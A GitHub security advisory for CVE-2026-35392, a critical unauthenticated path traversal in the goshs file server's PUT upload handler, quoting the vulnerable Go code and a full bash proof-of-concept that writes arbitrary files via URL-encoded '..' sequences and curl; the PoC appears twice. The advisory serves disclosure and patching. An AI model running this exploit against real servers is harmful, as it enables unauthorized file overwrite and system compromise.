GHSA-G8MV-VP7J-QP64

Vulnerability from github – Published: 2026-04-03 04:07 – Updated: 2026-04-06 23:43
VLAI?
Summary
goshs: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in goshs PUT Upload
Details

Summary

  • PUT upload has no path sanitization | httpserver/updown.go:20-69

This finding affects the default configuration, no flags or authentication required.

Details

File: httpserver/updown.go:20-69 Trigger: PUT /<path> (server.go:57-59 routes directly to put())

The handler uses req.URL.Path raw to build the save path. No filepath.Clean, no .. check, no webroot containment.

func (fs *FileServer) put(w http.ResponseWriter, req *http.Request) {
    upath := req.URL.Path                              // unsanitized

    filename := strings.Split(upath, "/")
    outName := filename[len(filename)-1]

    targetpath := strings.Split(upath, "/")
    targetpath = targetpath[:len(targetpath)-1]
    target := strings.Join(targetpath, "/")

    savepath := fmt.Sprintf("%s%s/%s", fs.UploadFolder, target, outName)
    // ...
    os.Create(savepath)                                // arbitrary path write

UploadFolder defaults to Webroot (main.go:386-388). The path is pure string concatenation with no validation.

Impact: Unauthenticated arbitrary file write anywhere on the filesystem.

PoCs:

#!/usr/bin/env bash
# Write an arbitrary file on a running goshs instance via PUT.
#
# Usage: ./arbitrary_overwrite1.sh <host> <port> <local-file> <absolute-target-path>

set -euo pipefail

HOST="${1:?Usage: $0 <host> <port> <local-file> <absolute-target-path>}"
PORT="${2:?Usage: $0 <host> <port> <local-file> <absolute-target-path>}"
LOCAL_FILE="${3:?Usage: $0 <host> <port> <local-file> <absolute-target-path>}"
TARGET="${4:?Usage: $0 <host> <port> <local-file> <absolute-target-path>}"

if [ ! -f "$LOCAL_FILE" ]; then
    echo "[-] Local file not found: $LOCAL_FILE"
    exit 1
fi

# 16 levels of %2e%2e/ (URL-encoded "..") to reach filesystem root.
# Encoding is required so curl does not resolve the traversal client-side.
TRAVERSAL=""
for _ in $(seq 1 16); do
    TRAVERSAL="${TRAVERSAL}%2e%2e/"
done

# Strip leading / from target
TARGET_REL="${TARGET#/}"

PUT_PATH="/${TRAVERSAL}${TARGET_REL}"

echo "[*] Source:  ${LOCAL_FILE}"
echo "[*] Target:  ${TARGET}"
echo "[*] PUT:     ${PUT_PATH}"
echo ""

HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" \
    --path-as-is \
    -X PUT --data-binary "@${LOCAL_FILE}" \
    "http://${HOST}:${PORT}${PUT_PATH}")

echo "[*] HTTP ${HTTP_CODE}"
echo "[*] File should now exist at ${TARGET} on the target."

To execute it: ./arbitrary_overwrite2.sh 10.1.2.2 8000 ./canary /tmp/can

Recommendations

Checking that the targeted file is part of the webroot could prevent these attacks. Also, ensure that the method return is called after every error response.

Severity ?
9.8 (Critical)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/patrickhener/goshs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.5-0.20260401172448-237f3af891a9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35392"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T04:07:55Z",
    "nvd_published_at": "2026-04-06T21:16:21Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n* PUT upload has no path sanitization | `httpserver/updown.go:20-69`\n\nThis finding affects the default configuration, no flags or authentication required.\n\n### Details\n\n**File:** `httpserver/updown.go:20-69`\n**Trigger:** `PUT /\u003cpath\u003e` (server.go:57-59 routes directly to `put()`)\n\nThe handler uses `req.URL.Path` raw to build the save path. No `filepath.Clean`, no `..` check, no webroot containment.\n\n```go\nfunc (fs *FileServer) put(w http.ResponseWriter, req *http.Request) {\n    upath := req.URL.Path                              // unsanitized\n\n    filename := strings.Split(upath, \"/\")\n    outName := filename[len(filename)-1]\n\n    targetpath := strings.Split(upath, \"/\")\n    targetpath = targetpath[:len(targetpath)-1]\n    target := strings.Join(targetpath, \"/\")\n\n    savepath := fmt.Sprintf(\"%s%s/%s\", fs.UploadFolder, target, outName)\n    // ...\n    os.Create(savepath)                                // arbitrary path write\n```\n\n`UploadFolder` defaults to `Webroot` (main.go:386-388). The path is pure string concatenation with no validation.\n\n**Impact:** Unauthenticated arbitrary file write anywhere on the filesystem.\n\n**PoCs:**\n```bash\n#!/usr/bin/env bash\n# Write an arbitrary file on a running goshs instance via PUT.\n#\n# Usage: ./arbitrary_overwrite1.sh \u003chost\u003e \u003cport\u003e \u003clocal-file\u003e \u003cabsolute-target-path\u003e\n\nset -euo pipefail\n\nHOST=\"${1:?Usage: $0 \u003chost\u003e \u003cport\u003e \u003clocal-file\u003e \u003cabsolute-target-path\u003e}\"\nPORT=\"${2:?Usage: $0 \u003chost\u003e \u003cport\u003e \u003clocal-file\u003e \u003cabsolute-target-path\u003e}\"\nLOCAL_FILE=\"${3:?Usage: $0 \u003chost\u003e \u003cport\u003e \u003clocal-file\u003e \u003cabsolute-target-path\u003e}\"\nTARGET=\"${4:?Usage: $0 \u003chost\u003e \u003cport\u003e \u003clocal-file\u003e \u003cabsolute-target-path\u003e}\"\n\nif [ ! -f \"$LOCAL_FILE\" ]; then\n    echo \"[-] Local file not found: $LOCAL_FILE\"\n    exit 1\nfi\n\n# 16 levels of %2e%2e/ (URL-encoded \"..\") to reach filesystem root.\n# Encoding is required so curl does not resolve the traversal client-side.\nTRAVERSAL=\"\"\nfor _ in $(seq 1 16); do\n    TRAVERSAL=\"${TRAVERSAL}%2e%2e/\"\ndone\n\n# Strip leading / from target\nTARGET_REL=\"${TARGET#/}\"\n\nPUT_PATH=\"/${TRAVERSAL}${TARGET_REL}\"\n\necho \"[*] Source:  ${LOCAL_FILE}\"\necho \"[*] Target:  ${TARGET}\"\necho \"[*] PUT:     ${PUT_PATH}\"\necho \"\"\n\nHTTP_CODE=$(curl -s -o /dev/null -w \"%{http_code}\" \\\n    --path-as-is \\\n    -X PUT --data-binary \"@${LOCAL_FILE}\" \\\n    \"http://${HOST}:${PORT}${PUT_PATH}\")\n\necho \"[*] HTTP ${HTTP_CODE}\"\necho \"[*] File should now exist at ${TARGET} on the target.\"\n```\n\nTo execute it: `./arbitrary_overwrite2.sh 10.1.2.2 8000 ./canary /tmp/can`\n\n## Recommendations\n\nChecking that the targeted file is part of the webroot could prevent these attacks. Also, ensure that the method `return` is called after every error response.",
  "id": "GHSA-g8mv-vp7j-qp64",
  "modified": "2026-04-06T23:43:45Z",
  "published": "2026-04-03T04:07:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-g8mv-vp7j-qp64"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35392"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patrickhener/goshs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "goshs: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) in goshs PUT Upload"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.